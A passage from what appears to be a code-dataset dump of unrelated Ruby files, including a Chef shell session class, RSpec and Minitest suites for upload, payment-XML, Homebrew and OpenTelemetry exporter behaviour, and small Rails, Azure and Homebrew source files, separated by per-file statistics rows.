@client.run_ohai
@client.load_node
@client.build_node
end
end
class ClientSession < SoloSession
session_type :client
def save_node
@client.save_node
end
def rebuild_context
@run_status = Chef::RunStatus.new(@node, @events)
Chef::Cookbook::FileVendor.on_create { |manifest| Chef::Cookbook::RemoteFileVendor.new(manifest, Chef::REST.new(Chef::Config[:server_url])) }
cookbook_hash = @client.sync_cookbooks
cookbook_collection = Chef::CookbookCollection.new(cookbook_hash)
@run_context = Chef::RunContext.new(node, cookbook_collection, @events)
@run_context.load(Chef::RunList::RunListExpansionFromAPI.new("_default", []))
@run_status.run_context = run_context
end
private
def rebuild_node
# Make sure the client knows this is not chef solo
Chef::Config[:solo] = false
@client = Chef::Client.new
@client.run_ohai
@client.register
@client.load_node
@client.build_node
end
end
class DoppelGangerClient < Chef::Client
attr_reader :node_name
def initialize(node_name)
@node_name = node_name
@ohai = Ohai::System.new
end
# Run the very smallest amount of ohai we can get away with and still
# hope to have things work. Otherwise we're not very good doppelgangers
def run_ohai
@ohai.require_plugin('os')
end
# DoppelGanger implementation of build_node. Preserves as many of the node's
# attributes as possible, and does not save updates to the server.
def build_node
Chef::Log.debug("Building node object for #{@node_name}")
@node = Chef::Node.find_or_create(node_name)
ohai_data = @ohai.data.merge(@node.automatic_attrs)
@node.consume_external_attrs(ohai_data,nil)
@run_list_expansion = @node.expand!('server')
@expanded_run_list_with_versions = @run_list_expansion.recipes.with_version_constraints_strings
Chef::Log.info("Run List is [#{@node.run_list}]")
Chef::Log.info("Run List expands to [#{@expanded_run_list_with_versions.join(', ')}]")
@node
end
def register
@rest = Chef::REST.new(Chef::Config[:chef_server_url], Chef::Config[:node_name], Chef::Config[:client_key])
end
end
class DoppelGangerSession < ClientSession
session_type "doppelganger client"
def save_node
puts "A doppelganger should think twice before saving the node"
end
def assume_identity(node_name)
Chef::Config[:doppelganger] = @node_name = node_name
reset!
rescue Exception => e
puts "#{e.class.name}: #{e.message}"
puts Array(e.backtrace).join("\n")
puts
puts "* " * 40
puts "failed to assume the identity of node '#{node_name}', resetting"
puts "* " * 40
puts
Chef::Config[:doppelganger] = false
@node_built = false
Shell.session
end
def rebuild_node
# Make sure the client knows this is not chef solo
Chef::Config[:solo] = false
@client = DoppelGangerClient.new(@node_name)
@client.run_ohai
@client.register
@client.load_node
@client.build_node
@client.sync_cookbooks
end
end
end
| 27.093645 | 147 | 0.673621 |
21465d9e98ecba607ae9058f6f0c1025bf264d97 | 377 | #
# File : B.rb
# Author : Kazune Takahashi
# Created : 2018-11-4 16:38:39
# Powered by Visual Studio Code
#
x = gets.to_i
ok = Array.new(1010){false}
ok[0] = ok[1] = true
for i in 2...1010 do
for j in 2...1010 do
if i ** j < 1010
ok[i ** j] = true
else
break
end
end
end
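# ok[v] is now true for every perfect power v = i**j (j >= 2) below 1010,
# plus 0 and 1; the scan below walks down from x to find the largest such
# value not exceeding x.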
for i in 0...1010 do
if ok[x - i]
puts x - i
exit
end
end | 13.962963 | 31 | 0.546419 |
d5b4e95b0b46ed272e8c07cb8327717a833430a5 | 3,511 | require 'rails_helper'
describe "upload UntaggedAnimalAssessment category", type: :feature do
let(:user) { create(:user) }
let(:valid_file) { "#{Rails.root}/db/sample_data_files/untagged_animal_assessment/Untagged_assessment_03122018.csv" }
let(:invalid_file) { "#{Rails.root}/spec/support/csv/invalid_headers.csv" }
let(:incomplete_data_file) { "#{Rails.root}/spec/support/csv/Untagged_assessment_03122018-invalid-rows.csv" }
let(:expected_success_message) { 'Successfully queued spreadsheet for import' }
let(:temporary_file) { create(:temporary_file, contents: File.read(valid_file)) }
before do
sign_in user
visit new_file_upload_path
end
context 'when user successfully uploads a CSV with no errors' do
it "creates new ProcessedFile record with 'Processed' status " do
upload_file("Untagged Animal Assessment", valid_file)
processed_file = ProcessedFile.last
expect(ProcessedFile.count).to eq 1
expect(processed_file.status).to eq "Processed"
expect(processed_file.job_errors).to eq(nil)
expect(processed_file.job_stats).to eq(
{
"row_count" => 250,
"rows_imported" => 250,
"shl_case_numbers" => {"SF16-9A"=>50, "SF16-9B"=>50, "SF16-9C"=>50, "SF16-9D"=>50, "SF16-9E"=>50}
}
)
expect(page).to have_content expected_success_message
end
end
context 'when user uploads a CSV with invalid headers' do
it "creates new ProcessedFile record with 'Failed' status" do
upload_file("Untagged Animal Assessment", invalid_file)
processed_file = ProcessedFile.last
expect(ProcessedFile.count).to eq 1
expect(processed_file.status).to eq "Failed"
expect(processed_file.job_errors).to eq "Does not have valid header(s). Data not imported!"
expect(processed_file.job_stats).to eq({})
expect(page).to have_content expected_success_message
end
end
context 'when user uploads a CSV that has already been processed' do
before do
FactoryBot.create :processed_file,
filename: 'Untagged_assessment_03122018.csv',
category: 'Untagged Animal Assessment',
status: 'Processed',
temporary_file_id: temporary_file.id
end
it "creates new ProcessedFile record with 'Failed' status" do
upload_file("Untagged Animal Assessment", valid_file)
processed_file = ProcessedFile.where(status: "Failed").first
expect(ProcessedFile.count).to eq 2
expect(processed_file.job_errors).to eq "Already processed a file on #{processed_file.created_at.strftime('%m/%d/%Y')} with the same name: Untagged_assessment_03122018.csv. Data not imported!"
expect(processed_file.job_stats).to eq({})
expect(page).to have_content expected_success_message
end
end
context 'when user uploads a file with invalid rows' do
it "creates new ProcessedFile record with 'Failed' status" do
upload_file("Untagged Animal Assessment", incomplete_data_file)
processed_file = ProcessedFile.last
expect(ProcessedFile.count).to eq 1
expect(processed_file.status).to eq "Failed"
expect(processed_file.job_errors).to eq("Does not have valid row(s). Data not imported!")
expect(processed_file.job_stats).to eq({"row_number_2"=>{"cohort"=>[{"error"=>"blank"}]}, "row_number_3"=>{"growout_rack"=>[{"error"=>"blank"}]}})
expect(page).to have_content expected_success_message
end
end
end
| 43.345679 | 198 | 0.698946 |
1a9f6aefa3b12a635270b0649415bafdcf7c87ad | 1,074 | # frozen_string_literal: true
module Clowne
module Adapters # :nodoc: all
class ActiveRecord
module Resolvers
class UnknownAssociation < StandardError; end
class Association
class << self
# rubocop: disable Metrics/ParameterLists
def call(source, record, declaration, adapter:, params:, **_options)
reflection = source.class.reflections[declaration.name.to_s]
if reflection.nil?
raise UnknownAssociation,
"Association #{declaration.name} couldn't be found for #{source.class}"
end
cloner_class = Associations.cloner_for(reflection)
cloner_class.new(reflection, source, declaration, adapter, params).call(record)
record
end
# rubocop: enable Metrics/ParameterLists
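# Illustrative flow (hypothetical models): a cloner declaration naming
# :posts on a User looks up User.reflections["posts"] and delegates the
# copy to the reflection-specific cloner from Associations.cloner_for.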
end
end
end
end
end
end
Clowne::Adapters::ActiveRecord.register_resolver(
:association,
Clowne::Adapters::ActiveRecord::Resolvers::Association,
before: :nullify
)
| 27.538462 | 93 | 0.623836 |
629b21c786819d750fae641df1fa0da6b73ab1e3 | 275 | class Category < ApplicationRecord
resourcify
acts_as_tree counter_cache: :children_count
extend FriendlyId
friendly_id :name, use: :slugged, routes: :default
has_and_belongs_to_many :sections, join_table: :section_categories
def to_s
self.name
end
end
| 18.333333 | 68 | 0.774545 |
bbfe01df29e3ff0e22b8ab999c408333037657a2 | 1,855 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DataShare::Mgmt::V2018_11_01_preview
module Models
#
# Log specifications for the operation API
#
class OperationMetaLogSpecification
include MsRestAzure
# @return [String] blob duration of the log
attr_accessor :blob_duration
# @return [String] localized name of the log category
attr_accessor :display_name
# @return [String] name of the log category
attr_accessor :name
#
# Mapper for OperationMetaLogSpecification class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'OperationMetaLogSpecification',
type: {
name: 'Composite',
class_name: 'OperationMetaLogSpecification',
model_properties: {
blob_duration: {
client_side_validation: true,
required: false,
serialized_name: 'blobDuration',
type: {
name: 'String'
}
},
display_name: {
client_side_validation: true,
required: false,
serialized_name: 'displayName',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
serialized_name: 'name',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 26.884058 | 70 | 0.525606 |
2141cb7274f487f15ee9331a4a78da42aaa914ae | 36 | module Abra
VERSION = "1.0.2"
end
| 9 | 19 | 0.638889 |
7ae2bae5e10b9b515d7d602f80ed6864d00348f6 | 963 | require 'formula'
class Dart < Formula
homepage 'https://www.dartlang.org/'
if MacOS.prefer_64_bit?
url 'https://storage.googleapis.com/dart-archive/channels/stable/release/38663/sdk/dartsdk-macos-x64-release.zip'
sha1 'fc214070863861e444b0a9619dd92a93c0932bc9'
else
url 'https://storage.googleapis.com/dart-archive/channels/stable/release/38663/sdk/dartsdk-macos-ia32-release.zip'
sha1 'd6d2ba9950f3625d15c39814c183364dcd46b945'
end
version '1.5.8'
def install
libexec.install Dir['*']
bin.install_symlink "#{libexec}/bin/dart"
bin.write_exec_script Dir["#{libexec}/bin/{pub,dart?*}"]
end
def caveats; <<-EOS.undent
To use with IntelliJ, set the Dart home to:
#{opt_libexec}
EOS
end
test do
(testpath/'sample.dart').write <<-EOS.undent
void main() {
print(r"test message");
}
EOS
assert_equal "test message\n", shell_output("#{bin}/dart sample.dart")
end
end
| 25.342105 | 118 | 0.69055 |
798538a3445d2d430353f28bf4633936fab0168f | 1,704 | require 'fileutils'
require 'tempfile'
require_relative 'spec_helper'
module Aws
module EventStream
describe Encoder do
describe "#encode" do
Dir.glob(File.expand_path('../fixtures/decoded/positive/*', __FILE__)).each do |path|
suit_name = File.basename(path)
expect_path = File.join(File.expand_path('../fixtures/encoded/positive', __FILE__), suit_name)
msg_raw = SpecHelper.convert_msg(path) # msg to be encoded
it "encode suit: #{suit_name} correctly" do
file = Tempfile.new('foo')
Encoder.new.encode(msg_raw, file)
expect(FileUtils.compare_file(file.path, expect_path)).to be(true)
file.unlink
end
end
end
describe "#encode error" do
it 'raises an error when payload exceeds' do
payload = double('payload', :length => 16777217)
message = Aws::EventStream::Message.new(
headers: {},
payload: payload
)
expect {
Encoder.new.encode(message)
}.to raise_error(Aws::EventStream::Errors::EventPayloadLengthExceedError)
end
it 'raises an error when encoded headers exceeds' do
headers = {}
headers['foo'] = Aws::EventStream::HeaderValue.new(
value: "*" * 131073, type: 'string'
)
message = Aws::EventStream::Message.new(
headers: headers,
payload: StringIO.new
)
expect {
Encoder.new.encode(message)
}.to raise_error(Aws::EventStream::Errors::EventHeadersLengthExceedError)
end
end
end
end
end
| 27.047619 | 104 | 0.579812 |
ac0ea7b67e52ffd91e2bcf83cb931b6ff7282f64 | 1,760 | require "application_system_test_case"
class CommandActionsTest < ApplicationSystemTestCase
setup do
@command_action = command_actions(:one)
end
test "visiting the index" do
visit command_actions_url
assert_selector "h1", text: "Command Actions"
end
test "creating a Command action" do
visit command_actions_url
click_on "New Command Action"
fill_in "Act", with: @command_action.act
fill_in "Card", with: @command_action.card_id
fill_in "E No", with: @command_action.e_no
fill_in "Generate No", with: @command_action.generate_no
fill_in "Gowait", with: @command_action.gowait
fill_in "Result No", with: @command_action.result_no
fill_in "S No", with: @command_action.s_no
fill_in "Timing", with: @command_action.timing
click_on "Create Command action"
assert_text "Command action was successfully created"
click_on "Back"
end
test "updating a Command action" do
visit command_actions_url
click_on "Edit", match: :first
fill_in "Act", with: @command_action.act
fill_in "Card", with: @command_action.card_id
fill_in "E No", with: @command_action.e_no
fill_in "Generate No", with: @command_action.generate_no
fill_in "Gowait", with: @command_action.gowait
fill_in "Result No", with: @command_action.result_no
fill_in "S No", with: @command_action.s_no
fill_in "Timing", with: @command_action.timing
click_on "Update Command action"
assert_text "Command action was successfully updated"
click_on "Back"
end
test "destroying a Command action" do
visit command_actions_url
page.accept_confirm do
click_on "Destroy", match: :first
end
assert_text "Command action was successfully destroyed"
end
end
| 30.344828 | 60 | 0.725568 |
ab1d3f079b49b4c6563c809d3258292e80481569 | 2,205 | module OpenConferenceWare
module ProposalsHelper
# Return a link with a +label+ for sorting records by +field+. The optional
# +kind+ (e.g., :sessions or :proposals) determines what URLs to generate;
# if one isn't specified, the @kind instance variable will be used.
def sort_link_for(label, field, kind=nil)
kind ||= @kind
opts = {sort: field}
opts[:dir] = 'desc' if ( field == params[:sort] && params[:dir] != 'desc' )
link = link_to(label, self.send("event_#{kind}_path", @event, opts))
link += ( params[:dir] == 'desc' ? ' ∨' : ' ∧' ).html_safe if field == params[:sort]
return link
end
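# e.g. (hypothetical params): with params[:sort] == "title" and no :dir,
# sort_link_for("Title", "title") emits a link carrying dir=desc and
# renders the label as "Title ∧".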
# Return a link path for the given +object+. The optional +kind+ (e.g.,
# :sessions or :proposals) determines what kind of links to make; if one
# isn't specified, the @kind instance variable will be used.
def record_path(object, kind=nil)
kind ||= @kind
raise ArgumentError, "No kind or @kind specified" unless kind
kind = kind.to_s.singularize
return self.send("#{kind}_path", object)
end
# Return a link path for the collection. The optional +kind+ (e.g.,
# :sessions or :proposals) determines what kind of links to make; if one
# isn't specified, the @kind instance variable will be used.
def records_path(kind=nil)
kind = (kind || @kind).to_s.pluralize
return self.send("event_#{kind}_path", @event)
end
# Return a path to the next proposal after +proposal+, or nil if there is none.
def next_proposal_path_from(proposal)
if selector?
next_proposal = proposal.next_random_proposal(current_user.id, current_user.id)
else
next_proposal = proposal.next_proposal
end
next_proposal ? proposal_path(next_proposal) : nil
end
# Return a path to the previous proposal before +proposal+, or nil if there is none.
def previous_proposal_path_from(proposal)
if selector?
previous_proposal = proposal.previous_random_proposal(current_user.id)
else
previous_proposal = proposal.previous_proposal
end
previous_proposal ? proposal_path(previous_proposal) : nil
end
end
end
| 37.372881 | 97 | 0.666667 |
910ed16320817989153e7fa234d08182129f1b43 | 1,774 | RSpec.describe WorldpayCnp::XML do
describe ".parse" do
it "parses XML (string) to a hash" do
hash = described_class.parse(fixture_file("sale_sample.xml").read)
expect(hash).to eq(
'cnpOnlineRequest' => {
'version' => '12.8',
'merchantId' => '1',
'authentication' => {
'user' => 'username',
'password' => 'password'
},
'sale' => {
'id' => "test-123",
'reportGroup' => 'Default Report Group',
'orderId' => "test-456",
'amount' => '1000',
'orderSource' => 'ecommerce',
'card' => {
'type' => 'VI',
'number' =>'4457010000000009',
'expDate' =>'1025',
'cardValidationNum' => '349',
}
}
}
)
end
end
describe ".serialize" do
it "serializes a hash into XML (string)" do
hash = {
'cnpOnlineRequest' => {
'@xmlns': 'http://www.vantivcnp.com/schema',
'@version' => '12.8',
'@merchantId' => '1',
'authentication' => {
'user' => 'username',
'password' => 'password'
},
'sale' => {
'@id' => "test-123",
'@reportGroup' => 'Default Report Group',
'orderId' => "test-456",
'amount' => '1000',
'orderSource' => 'ecommerce',
'card' => {
'type' => 'VI',
'number' => '4457010000000009',
'expDate' => '1025',
'cardValidationNum' => '349',
}
}
}
}
expect(described_class.serialize(hash)).to eq fixture_file("sale_sample.xml").read
end
end
end
| 27.292308 | 88 | 0.429538 |
7a3ab65e0aef98e0dbea036c9ca260ff605cf50e | 5,614 | require "testing_env"
require "formula"
require "formula_installer"
require "utils/bottles"
class FormularyTest < Homebrew::TestCase
def test_class_naming
assert_equal "ShellFm", Formulary.class_s("shell.fm")
assert_equal "Fooxx", Formulary.class_s("foo++")
assert_equal "SLang", Formulary.class_s("s-lang")
assert_equal "PkgConfig", Formulary.class_s("pkg-config")
assert_equal "FooBar", Formulary.class_s("foo_bar")
end
end
class FormularyFactoryTest < Homebrew::TestCase
def setup
@name = "testball_bottle"
@path = CoreTap.new.formula_dir/"#{@name}.rb"
@bottle_dir = Pathname.new("#{File.expand_path("..", __FILE__)}/bottles")
@bottle = @bottle_dir/"testball_bottle-0.1.#{Utils::Bottles.tag}.bottle.tar.gz"
@path.write <<-EOS.undent
class #{Formulary.class_s(@name)} < Formula
url "file://#{File.expand_path("..", __FILE__)}/tarballs/testball-0.1.tbz"
sha256 TESTBALL_SHA256
bottle do
cellar :any_skip_relocation
root_url "file://#{@bottle_dir}"
sha256 "9abc8ce779067e26556002c4ca6b9427b9874d25f0cafa7028e05b5c5c410cb4" => :#{Utils::Bottles.tag}
end
def install
prefix.install "bin"
prefix.install "libexec"
end
end
EOS
end
def teardown
@path.unlink
end
def test_factory
assert_kind_of Formula, Formulary.factory(@name)
end
def test_factory_with_fully_qualified_name
assert_kind_of Formula, Formulary.factory("homebrew/core/#{@name}")
end
def test_formula_unavailable_error
assert_raises(FormulaUnavailableError) { Formulary.factory("not_existed_formula") }
end
def test_formula_class_unavailable_error
name = "giraffe"
path = CoreTap.new.formula_dir/"#{name}.rb"
path.write "class Wrong#{Formulary.class_s(name)} < Formula\nend\n"
assert_raises(FormulaClassUnavailableError) { Formulary.factory(name) }
ensure
path.unlink
end
def test_factory_from_path
assert_kind_of Formula, Formulary.factory(@path)
end
def test_factory_from_url
formula = shutup { Formulary.factory("file://#{@path}") }
assert_kind_of Formula, formula
ensure
formula.path.unlink
end
def test_factory_from_bottle
formula = Formulary.factory(@bottle)
assert_kind_of Formula, formula
assert_equal @bottle.realpath, formula.local_bottle_path
end
def test_factory_from_alias
alias_dir = CoreTap.instance.alias_dir
alias_dir.mkpath
FileUtils.ln_s @path, alias_dir/"foo"
assert_kind_of Formula, Formulary.factory("foo")
ensure
alias_dir.rmtree
end
def test_factory_from_rack_and_from_keg
formula = Formulary.factory(@path)
installer = FormulaInstaller.new(formula)
shutup { installer.install }
keg = Keg.new(formula.prefix)
f = Formulary.from_rack(formula.rack)
assert_kind_of Formula, f
assert_kind_of Tab, f.build
f = Formulary.from_keg(keg)
assert_kind_of Formula, f
assert_kind_of Tab, f.build
ensure
keg.unlink
keg.uninstall
formula.clear_cache
formula.bottle.clear_cache
end
def test_load_from_contents
assert_kind_of Formula, Formulary.from_contents(@name, @path, @path.read)
end
def test_to_rack
assert_equal HOMEBREW_CELLAR/@name, Formulary.to_rack(@name)
(HOMEBREW_CELLAR/@name).mkpath
assert_equal HOMEBREW_CELLAR/@name, Formulary.to_rack(@name)
assert_raises(TapFormulaUnavailableError) { Formulary.to_rack("a/b/#{@name}") }
ensure
FileUtils.rm_rf HOMEBREW_CELLAR/@name
end
end
class FormularyTapFactoryTest < Homebrew::TestCase
def setup
@name = "foo"
@tap = Tap.new "homebrew", "foo"
@path = @tap.path/"#{@name}.rb"
@code = <<-EOS.undent
class #{Formulary.class_s(@name)} < Formula
url "foo-1.0"
end
EOS
@path.write @code
end
def teardown
@tap.path.rmtree
end
def test_factory_tap_formula
assert_kind_of Formula, Formulary.factory(@name)
end
def test_factory_tap_alias
alias_dir = @tap.path/"Aliases"
alias_dir.mkpath
FileUtils.ln_s @path, alias_dir/"bar"
assert_kind_of Formula, Formulary.factory("bar")
end
def test_tap_formula_unavailable_error
assert_raises(TapFormulaUnavailableError) { Formulary.factory("#{@tap}/not_existed_formula") }
end
def test_factory_tap_formula_with_fully_qualified_name
assert_kind_of Formula, Formulary.factory("#{@tap}/#{@name}")
end
def test_factory_ambiguity_tap_formulae
another_tap = Tap.new "homebrew", "bar"
(another_tap.path/"#{@name}.rb").write @code
assert_raises(TapFormulaAmbiguityError) { Formulary.factory(@name) }
ensure
another_tap.path.rmtree
end
end
class FormularyTapPriorityTest < Homebrew::TestCase
def setup
@name = "foo"
@core_path = CoreTap.new.formula_dir/"#{@name}.rb"
@tap = Tap.new "homebrew", "foo"
@tap_path = @tap.path/"#{@name}.rb"
code = <<-EOS.undent
class #{Formulary.class_s(@name)} < Formula
url "foo-1.0"
end
EOS
@core_path.write code
@tap_path.write code
end
def teardown
@core_path.unlink
@tap.path.rmtree
end
def test_find_with_priority_core_formula
formula = Formulary.find_with_priority(@name)
assert_kind_of Formula, formula
assert_equal @core_path, formula.path
end
def test_find_with_priority_tap_formula
@tap.pin
formula = shutup { Formulary.find_with_priority(@name) }
assert_kind_of Formula, formula
assert_equal @tap_path.realpath, formula.path
ensure
@tap.pinned_symlink_path.parent.parent.rmtree
end
end
| 27.385366 | 109 | 0.708942 |
1acb5846fcf9028026ddb5104637bfb58fc791e7 | 3,687 | require 'spec_helper'
describe Ability, lib: true do
describe '.users_that_can_read_project' do
context 'using a public project' do
it 'returns all the users' do
project = create(:project, :public)
user = build(:user)
expect(described_class.users_that_can_read_project([user], project)).
to eq([user])
end
end
context 'using an internal project' do
let(:project) { create(:project, :internal) }
it 'returns users that are administrators' do
user = build(:user, admin: true)
expect(described_class.users_that_can_read_project([user], project)).
to eq([user])
end
it 'returns internal users while skipping external users' do
user1 = build(:user)
user2 = build(:user, external: true)
users = [user1, user2]
expect(described_class.users_that_can_read_project(users, project)).
to eq([user1])
end
it 'returns external users if they are the project owner' do
user1 = build(:user, external: true)
user2 = build(:user, external: true)
users = [user1, user2]
expect(project).to receive(:owner).twice.and_return(user1)
expect(described_class.users_that_can_read_project(users, project)).
to eq([user1])
end
it 'returns external users if they are project members' do
user1 = build(:user, external: true)
user2 = build(:user, external: true)
users = [user1, user2]
expect(project.team).to receive(:members).twice.and_return([user1])
expect(described_class.users_that_can_read_project(users, project)).
to eq([user1])
end
it 'returns an empty Array if all users are external users without access' do
user1 = build(:user, external: true)
user2 = build(:user, external: true)
users = [user1, user2]
expect(described_class.users_that_can_read_project(users, project)).
to eq([])
end
end
context 'using a private project' do
let(:project) { create(:project, :private) }
it 'returns users that are administrators' do
user = build(:user, admin: true)
expect(described_class.users_that_can_read_project([user], project)).
to eq([user])
end
it 'returns external users if they are the project owner' do
user1 = build(:user, external: true)
user2 = build(:user, external: true)
users = [user1, user2]
expect(project).to receive(:owner).twice.and_return(user1)
expect(described_class.users_that_can_read_project(users, project)).
to eq([user1])
end
it 'returns external users if they are project members' do
user1 = build(:user, external: true)
user2 = build(:user, external: true)
users = [user1, user2]
expect(project.team).to receive(:members).twice.and_return([user1])
expect(described_class.users_that_can_read_project(users, project)).
to eq([user1])
end
it 'returns an empty Array if all users are internal users without access' do
user1 = build(:user)
user2 = build(:user)
users = [user1, user2]
expect(described_class.users_that_can_read_project(users, project)).
to eq([])
end
it 'returns an empty Array if all users are external users without access' do
user1 = build(:user, external: true)
user2 = build(:user, external: true)
users = [user1, user2]
expect(described_class.users_that_can_read_project(users, project)).
to eq([])
end
end
end
end
| 31.245763 | 83 | 0.628967 |
ac262aec00b69ff8dbc44f2ee2d852ebdcf54e7d | 28,970 | # frozen_string_literal: true
# Copyright The OpenTelemetry Authors
#
# SPDX-License-Identifier: Apache-2.0
require 'test_helper'
describe OpenTelemetry::Exporter::OTLP::Exporter do
SUCCESS = OpenTelemetry::SDK::Trace::Export::SUCCESS
FAILURE = OpenTelemetry::SDK::Trace::Export::FAILURE
TIMEOUT = OpenTelemetry::SDK::Trace::Export::TIMEOUT
describe '#initialize' do
it 'initializes with defaults' do
exp = OpenTelemetry::Exporter::OTLP::Exporter.new
_(exp).wont_be_nil
_(exp.instance_variable_get(:@headers)).must_be_empty
_(exp.instance_variable_get(:@timeout)).must_equal 10.0
_(exp.instance_variable_get(:@path)).must_equal '/v1/traces'
_(exp.instance_variable_get(:@compression)).must_be_nil
http = exp.instance_variable_get(:@http)
_(http.ca_file).must_be_nil
_(http.use_ssl?).must_equal true
_(http.address).must_equal 'localhost'
_(http.verify_mode).must_equal OpenSSL::SSL::VERIFY_PEER
_(http.port).must_equal 4318
end
it 'refuses invalid endpoint' do
assert_raises ArgumentError do
OpenTelemetry::Exporter::OTLP::Exporter.new(endpoint: 'not a url')
end
end
it 'uses endpoints path if provided' do
exp = OpenTelemetry::Exporter::OTLP::Exporter.new(endpoint: 'https://localhost/custom/path')
_(exp.instance_variable_get(:@path)).must_equal '/custom/path'
end
it 'only allows gzip compression or none' do
assert_raises ArgumentError do
OpenTelemetry::Exporter::OTLP::Exporter.new(compression: 'flate')
end
exp = OpenTelemetry::Exporter::OTLP::Exporter.new(compression: 'gzip')
_(exp).wont_be_nil
exp = OpenTelemetry::Exporter::OTLP::Exporter.new(compression: nil)
_(exp).wont_be_nil
end
it 'sets parameters from the environment' do
exp = with_env('OTEL_EXPORTER_OTLP_ENDPOINT' => 'http://localhost:1234',
'OTEL_EXPORTER_OTLP_CERTIFICATE' => '/foo/bar',
'OTEL_EXPORTER_OTLP_HEADERS' => 'a=b,c=d',
'OTEL_EXPORTER_OTLP_COMPRESSION' => 'gzip',
'OTEL_RUBY_EXPORTER_OTLP_SSL_VERIFY_NONE' => 'true',
'OTEL_EXPORTER_OTLP_TIMEOUT' => '11') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('a' => 'b', 'c' => 'd')
_(exp.instance_variable_get(:@timeout)).must_equal 11.0
_(exp.instance_variable_get(:@path)).must_equal '/v1/traces'
_(exp.instance_variable_get(:@compression)).must_equal 'gzip'
http = exp.instance_variable_get(:@http)
_(http.ca_file).must_equal '/foo/bar'
_(http.use_ssl?).must_equal false
_(http.address).must_equal 'localhost'
_(http.verify_mode).must_equal OpenSSL::SSL::VERIFY_NONE
_(http.port).must_equal 1234
end
it 'prefers explicit parameters rather than the environment' do
exp = with_env('OTEL_EXPORTER_OTLP_ENDPOINT' => 'https://localhost:1234',
'OTEL_EXPORTER_OTLP_CERTIFICATE' => '/foo/bar',
'OTEL_EXPORTER_OTLP_HEADERS' => 'a:b,c:d',
'OTEL_EXPORTER_OTLP_COMPRESSION' => 'flate',
'OTEL_RUBY_EXPORTER_OTLP_SSL_VERIFY_PEER' => 'true',
'OTEL_EXPORTER_OTLP_TIMEOUT' => '11') do
OpenTelemetry::Exporter::OTLP::Exporter.new(endpoint: 'http://localhost:4321',
certificate_file: '/baz',
headers: { 'x' => 'y' },
compression: 'gzip',
ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE,
timeout: 12)
end
_(exp.instance_variable_get(:@headers)).must_equal('x' => 'y')
_(exp.instance_variable_get(:@timeout)).must_equal 12.0
_(exp.instance_variable_get(:@path)).must_equal ''
_(exp.instance_variable_get(:@compression)).must_equal 'gzip'
http = exp.instance_variable_get(:@http)
_(http.ca_file).must_equal '/baz'
_(http.use_ssl?).must_equal false
_(http.verify_mode).must_equal OpenSSL::SSL::VERIFY_NONE
_(http.address).must_equal 'localhost'
_(http.port).must_equal 4321
end
it 'restricts explicit headers to a String or Hash' do
exp = OpenTelemetry::Exporter::OTLP::Exporter.new(headers: { 'token' => 'über' })
_(exp.instance_variable_get(:@headers)).must_equal('token' => 'über')
exp = OpenTelemetry::Exporter::OTLP::Exporter.new(headers: 'token=%C3%BCber')
_(exp.instance_variable_get(:@headers)).must_equal('token' => 'über')
error = _() {
exp = OpenTelemetry::Exporter::OTLP::Exporter.new(headers: Object.new)
_(exp.instance_variable_get(:@headers)).must_equal('token' => 'über')
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
end
describe 'Headers Environment Variable' do
it 'allows any number of equal sign (=) characters in the value' do
exp = with_env('OTEL_EXPORTER_OTLP_HEADERS' => 'a=b,c=d==,e=f') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('a' => 'b', 'c' => 'd==', 'e' => 'f')
exp = with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => 'a=b,c=d==,e=f') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('a' => 'b', 'c' => 'd==', 'e' => 'f')
end
it 'trims any leading or trailing whitespaces in keys and values' do
exp = with_env('OTEL_EXPORTER_OTLP_HEADERS' => 'a = b ,c=d , e=f') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('a' => 'b', 'c' => 'd', 'e' => 'f')
exp = with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => 'a = b ,c=d , e=f') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('a' => 'b', 'c' => 'd', 'e' => 'f')
end
it 'decodes values as URL encoded UTF-8 strings' do
exp = with_env('OTEL_EXPORTER_OTLP_HEADERS' => 'token=%C3%BCber') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('token' => 'über')
exp = with_env('OTEL_EXPORTER_OTLP_HEADERS' => '%C3%BCber=token') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('über' => 'token')
exp = with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => 'token=%C3%BCber') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('token' => 'über')
exp = with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => '%C3%BCber=token') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('über' => 'token')
end
it 'prefers TRACES specific variable' do
exp = with_env('OTEL_EXPORTER_OTLP_HEADERS' => 'a=b,c=d==,e=f', 'OTEL_EXPORTER_OTLP_TRACES_HEADERS' => 'token=%C3%BCber') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('token' => 'über')
end
it 'fails fast when header values are missing' do
error = _() {
with_env('OTEL_EXPORTER_OTLP_HEADERS' => 'a = ') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
error = _() {
with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => 'a = ') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
end
it 'fails fast when headers or values are not found' do
error = _() {
with_env('OTEL_EXPORTER_OTLP_HEADERS' => ',') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
